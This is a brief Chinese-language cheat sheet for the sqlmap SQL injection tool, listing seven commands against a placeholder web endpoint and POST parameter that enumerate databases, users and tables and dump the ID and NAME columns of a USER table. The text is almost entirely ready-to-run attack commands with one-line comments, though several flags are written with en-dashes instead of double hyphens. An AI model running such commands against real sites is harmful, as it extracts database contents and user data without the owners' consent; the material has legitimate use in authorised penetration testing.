sqlmap Linux的开源免费工具:http://sqlmap.org/
使用命令:
./sqlmap.py -u "http://xyz:1234/web/questions/questionlist" --data "tid=12345678" –dbs //列举数据库
./sqlmap.py -u "http://xyz:1234/web/questions/questionlist" --data "tid=12345678" –current-db //当前数据库
./sqlmap.py -u "http://xyz:1234/web/questions/questionlist" --data "tid=12345678" –users //用户列表
./sqlmap.py -u "http://xyz:1234/web/questions/questionlist" --data "tid=12345678" –current-user //当前用户
./sqlmap.py -u "http://xyz:1234/web/questions/questionlist" --data "tid=12345678" –tables -D "ORCL" //列举数据库的表名
./sqlmap.py -u "http://xyz:1234/web/questions/questionlist" --data "tid=12345678" –columns -T "USER" -D "ORCL" //获取表的列名
./sqlmap.py -u "http://xyz:1234/web/questions/questionlist" --data "tid=12345678" –dump -C "ID,NAME" -T "USER" -D "ORCL" //获取表中的数据,包含列